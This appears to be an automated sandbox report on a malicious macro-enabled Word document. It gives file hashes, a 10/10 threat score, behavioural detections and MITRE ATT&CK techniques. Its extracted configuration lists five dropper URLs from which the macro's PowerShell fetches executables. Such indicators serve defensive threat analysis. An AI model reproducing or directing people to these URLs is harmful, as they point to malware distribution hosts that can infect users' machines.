Overview

overview

10

Static

static

8

0286875001...18.doc

windows7-x64

10

0286875001...18.doc

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    02868750016b0cde2fa07620568b246e_JaffaCakes118

  • Size

    202KB

  • Sample

    240427-f4zpxscg9v

  • MD5

    02868750016b0cde2fa07620568b246e

  • SHA1

    242cf0ae87913e8591b9bada7165dc75c0cdc4ea

  • SHA256

    f630ad012c459958ec8f986f9ebf7bb9468bb0734d012e078ef5f240c639a597

  • SHA512

    43ec55d6a24de8bcfdcc9267c45654f85f5fb8db399491f5336333a9960fd202e21965104f894ed39fbb32be00f6d1c4ca759ee32dfc7da8abe4e6818618031a

  • SSDEEP

    3072:Z2y/Gdy5ktGDWLS0HZWD5w8K7Nk9yD7IBUg1r6EOpwg53RF:Z2k4NtGiL3HJk9yD7bgr6Eqwg53RF

Score
10/10
macro

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://femminent.com/wp/UqU/
exe.dropper

http://liberty.blvrdev.com/stats/bLH/
exe.dropper

http://milkteaway.azurewebsites.net/calendar/bNmo99828/
exe.dropper

http://nehashetty.xyz/wp-admin/vNWZ/
exe.dropper

http://storeofofficial.shop/pokjbg746ihrtr/3u/

Targets

    • Target

      02868750016b0cde2fa07620568b246e_JaffaCakes118

    • Size

      202KB

    • MD5

      02868750016b0cde2fa07620568b246e

    • SHA1

      242cf0ae87913e8591b9bada7165dc75c0cdc4ea

    • SHA256

      f630ad012c459958ec8f986f9ebf7bb9468bb0734d012e078ef5f240c639a597

    • SHA512

      43ec55d6a24de8bcfdcc9267c45654f85f5fb8db399491f5336333a9960fd202e21965104f894ed39fbb32be00f6d1c4ca759ee32dfc7da8abe4e6818618031a

    • SSDEEP

      3072:Z2y/Gdy5ktGDWLS0HZWD5w8K7Nk9yD7IBUg1r6EOpwg53RF:Z2k4NtGiL3HJk9yD7bgr6Eqwg53RF

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Tasks